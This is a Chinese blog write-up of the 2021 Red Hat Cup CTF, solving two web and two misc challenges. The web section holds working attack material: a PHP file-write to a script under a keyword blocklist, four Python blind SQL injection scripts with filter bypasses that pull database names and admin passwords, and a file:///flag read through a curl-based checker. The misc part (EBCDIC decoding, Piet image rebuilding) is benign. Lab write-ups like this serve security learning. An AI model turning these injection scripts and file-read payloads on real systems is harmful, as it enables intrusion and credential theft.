前言

参赛网址:https://race.ichunqiu.com/2021redhat

web

find_it

环境没了…只能说思路

开局就一个页面,其他啥也没有

robots.txt有提示1ndexx.php,但是访问的时候显示是500….

后面才知道是脑洞题,要访问.1ndexx.php.swp

然后拿到源码

<?php
$file=fopen("flag.php","r") or die("Unable 2 open!");
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));
echo '<br>';

$hack=fopen("hack.php","w") or die("Unable 2 open");
$a=$_GET['code'];

if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
    die("you die");
}
if(strlen($a)>33){
    die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>

虽然不知道是想干嘛但是可以看出来可以写马

?code=<?php phpinfo();?>

然后hack.php出现phpinfo的页面,flag在环境变量里面

WebsiteManger

和[CISCN2019 总决赛 Day2 Web1]Easyweb很像的一个题,ui都一毛一样…之前做过 [链接]([CISCN2019 总决赛 Day2 Web1]Easyweb)

登录框图片的呈现是通过传参id=

sql注入测得过滤了空格和union和limit…直接改改exp开跑

跑库名

import requests
url="http://1e3c0112-ddf3-4523-8d9b-c8511d39b3f2.node3.buuoj.cn/image.php"
payload="?id=if((select/**/ascii(substr(group_concat(schema_name),{},1))/**/from/**/information_schema.schemata)>{},1,0)#"
database=""
for count in range(64):
    low=40
    high=124
    now=64
    while True:
        r=requests.get(url+payload.format(count+1,now))
        if(high-low<2):
            database+=chr(high)
            print(database)
            break
        if("JFIF" in r.text):
            low=now
            now=int((low+high)/2)
            continue
        else:
            high=now
            now=int((low+high)/2)
            continue
print(database)

拿到库名,猜账号密码在ctf里面

跑表名

import requests
url="http://1e3c0112-ddf3-4523-8d9b-c8511d39b3f2.node3.buuoj.cn/image.php"
payload="?id=if((select/**/ascii(substr(group_concat(table_name),{},1))/**/from/**/information_schema.tables/**/where/**/table_schema='ctf')>{},1,0)#"
table=""
for count in range(64):
    low=40
    high=124
    now=64
    while True:
        r=requests.get(url+payload.format(count+1,now))
        if(high-low<2):
            table+=chr(high)
            print(table)
            break
        if("JFIF" in r.text):
            low=now
            now=int((low+high)/2)
            continue
        else:
            high=now
            now=int((low+high)/2)
            continue
print(table)

拿到表名image和users,账号密码应该就在users中

跑字段

import requests
url="http://1e3c0112-ddf3-4523-8d9b-c8511d39b3f2.node3.buuoj.cn/image.php"
payload="?id=if((select/**/ascii(substr(group_concat(column_name),{},1))/**/from/**/information_schema.columns/**/where/**/table_name='users')>{},1,0)#"
column=""
for count in range(64):
    low=40
    high=124
    now=64
    while True:
        r=requests.get(url+payload.format(count+1,now))
        if(high-low<2):
            column+=chr(high)
            print(column)
            break
        if("JFIF" in r.text):
            low=now
            now=int((low+high)/2)
            continue
        else:
            high=now
            now=int((low+high)/2)
            continue
print(column)

拿到username和password

跑数据

import requests
url="http://1e3c0112-ddf3-4523-8d9b-c8511d39b3f2.node3.buuoj.cn/image.php"
payload="?id=if((select/**/ascii(substr(group_concat(password),{},1))/**/from/**/ctf.users)>{},1,0)#"
word=""
for count in range(64):
    low=40
    high=124
    now=64
    while True:
        r=requests.get(url+payload.format(count+1,now))
        if(high-low<2):
            word+=chr(high)
            print(word)
            break
        if("JFIF" in r.text):
            low=now
            now=int((low+high)/2)
            continue
        else:
            high=now
            now=int((low+high)/2)
            continue
print(word)

拿到账号admin和密码一长串我忘了

然后登进去有个输入框,叫帮你用curl测试网站存活…

考虑伪协议读文件

payload

file:///flag

就拿到flag了

misc

签到

拿到的一个文件只有一个EBCDIC.txt,但是打开是乱码的

通过文件名知道内容经过了EBCDIC编码,要进行编码转换,所以我们从网上扒个脚本

#include <stdio.h>
#ifndef A2E__H

#define A2E__H

unsigned char ASCIItoEBCDIC(const unsigned char c);/* A2E.C */

unsigned char EBCDICtoASCII(const unsigned char c);/* A2E.C */

extern int ascii2ebcdic[256]; /* Toascii.C */

extern int ebcdic2ascii[256]; /* Toascii.C */

#endif /* A2E__H */


    static unsigned char a2e[256] = {

    0, 1, 2, 3, 55, 45, 46, 47, 22, 5, 37, 11, 12, 13, 14, 15,

    16, 17, 18, 19, 60, 61, 50, 38, 24, 25, 63, 39, 28, 29, 30, 31,

    64, 79,127,123, 91,108, 80,125, 77, 93, 92, 78,107, 96, 75, 97,

    240,241,242,243,244,245,246,247,248,249,122, 94, 76,126,110,111,

    124,193,194,195,196,197,198,199,200,201,209,210,211,212,213,214,

    215,216,217,226,227,228,229,230,231,232,233, 74,224, 90, 95,109,

    121,129,130,131,132,133,134,135,136,137,145,146,147,148,149,150,

    151,152,153,162,163,164,165,166,167,168,169,192,106,208,161, 7,

    32, 33, 34, 35, 36, 21, 6, 23, 40, 41, 42, 43, 44, 9, 10, 27,

    48, 49, 26, 51, 52, 53, 54, 8, 56, 57, 58, 59, 4, 20, 62,225,

    65, 66, 67, 68, 69, 70, 71, 72, 73, 81, 82, 83, 84, 85, 86, 87,

    88, 89, 98, 99,100,101,102,103,104,105,112,113,114,115,116,117,

    118,119,120,128,138,139,140,141,142,143,144,154,155,156,157,158,

    159,160,170,171,172,173,174,175,176,177,178,179,180,181,182,183,

    184,185,186,187,188,189,190,191,202,203,204,205,206,207,218,219,

    220,221,222,223,234,235,236,237,238,239,250,251,252,253,254,255

};



    static unsigned char e2a[256] = {

    0, 1, 2, 3,156, 9,134,127,151,141,142, 11, 12, 13, 14, 15,

    16, 17, 18, 19,157,133, 8,135, 24, 25,146,143, 28, 29, 30, 31,

    128,129,130,131,132, 10, 23, 27,136,137,138,139,140, 5, 6, 7,

    144,145, 22,147,148,149,150, 4,152,153,154,155, 20, 21,158, 26,

    32,160,161,162,163,164,165,166,167,168, 91, 46, 60, 40, 43, 33,

    38,169,170,171,172,173,174,175,176,177, 93, 36, 42, 41, 59, 94,

    45, 47,178,179,180,181,182,183,184,185,124, 44, 37, 95, 62, 63,

    186,187,188,189,190,191,192,193,194, 96, 58, 35, 64, 39, 61, 34,

    195, 97, 98, 99,100,101,102,103,104,105,196,197,198,199,200,201,

    202,106,107,108,109,110,111,112,113,114,203,204,205,206,207,208,

    209,126,115,116,117,118,119,120,121,122,210,211,212,213,214,215,

    216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,

    123, 65, 66, 67, 68, 69, 70, 71, 72, 73,232,233,234,235,236,237,

    125, 74, 75, 76, 77, 78, 79, 80, 81, 82,238,239,240,241,242,243,

    92,159, 83, 84, 85, 86, 87, 88, 89, 90,244,245,246,247,248,249,

    48, 49, 50, 51, 52, 53, 54, 55, 56, 57,250,251,252,253,254,255

};

unsigned char ASCIItoEBCDIC(const unsigned char c)
    {

    return a2e[c];

}

unsigned char EBCDICtoASCII(const unsigned char c)



    {

    return e2a[c];

}

int main(int argc, char* argv[])
{
FILE *fp,*fp1;
//char ch;
unsigned char getbuffer[20];
unsigned char ascch[20];
fp = fopen("F:\\360download\\EBCDIC\\EBCDIC.txt","rb");
if(fp != NULL)
{
fp1 = fopen("F:\\360download\\EBCDIC\\out.txt","w");
while (fread(getbuffer,1,1,fp)!=0)
{
ascch[0] = EBCDICtoASCII(getbuffer[0]);
fwrite(ascch,1,1,fp1);
//fputc(ascch,fp1);
//printf((char *)ascch);
}
fclose(fp1);
}
fclose(fp);
return 0;
}

直接跑脚本 拿到flag

flag{we1c0me_t0_redhat2021}

colorful code

拿到两个文件data1和data2

看了一眼 感觉data2是gif…但是后面修不出来,自闭了….

做了web再来仔细看看,发现了一点规律

这里data1的数字都在0到19

data2的六十组之后全是每三组相同的,是在暗示我前面60组数字三个一组吗

exp

a='00 00 00 00 00 C0 00 FF FF 00 FF 00 FF C0 FF FF C0 C0 C0 C0 FF C0 C0 00 FF 00 FF FF 00 00 C0 00 00 C0 00 C0 FF FF FF FF FF 00 FF FF C0 00 C0 00 00 C0 C0 C0 FF FF C0 FF C0 00 00 FF'b=a.split(' ')f=open('output.txt','w')for i in range(int(len(b)/3)): f.write("{} {} {}\n".format(int(b[3*i],16),int(b[3*i+1],16),int(b[3*i+2],16)))f.close()

拿到的结果

0 0 00 0 1920 255 2550 255 0255 192 255255 192 192192 192 255192 192 0255 0 255255 0 0192 0 0192 0 192255 255 255255 255 0255 255 1920 192 00 192 192192 255 255192 255 1920 0 255

然后算一下图片的长宽

with open('1.txt') as f:    a=f.read().split(' ')   print(len(a)-1)

拿到数字的组数7067,在线分解因数

然后就开始PIL画图

from PIL import Imageim = Image.new("RGB",(37,191),(255,255,255))a='00 00 00 00 00 C0 00 FF FF 00 FF 00 FF C0 FF FF C0 C0 C0 C0 FF C0 C0 00 FF 00 FF FF 00 00 C0 00 00 C0 00 C0 FF FF FF FF FF 00 FF FF C0 00 C0 00 00 C0 C0 C0 FF FF C0 FF C0 00 00 FF'b=a.split(' ')c=[]for i in range(int(len(b)/3)):    c.append(int(b[3*i],16))    c.append(int(b[3*i+1],16))  c.append(int(b[3*i+2],16))with open('data1') as f:  data1=f.read().split(' ')   for i in range(37):     for j in range(191):            k=int(data1[i*191+j])           im.putpixel([i, j], (int(b[3*k],16),int(b[3*k+1],16),int(b[3*k+2],16)))im.save('output.png')

拿到一张图片

piet语言,甩上去在线网站跑https://www.bertnase.de/npiet/npiet-execute.php

成功拿到flag

flag{88842f20-fb8c-45c9-ae8f-36135b6a0f11}

尾言

就只是记录一下我还是那么菜…

说点什么
支持Markdown语法
好耶,沙发还空着ヾ(≧▽≦*)o
Loading...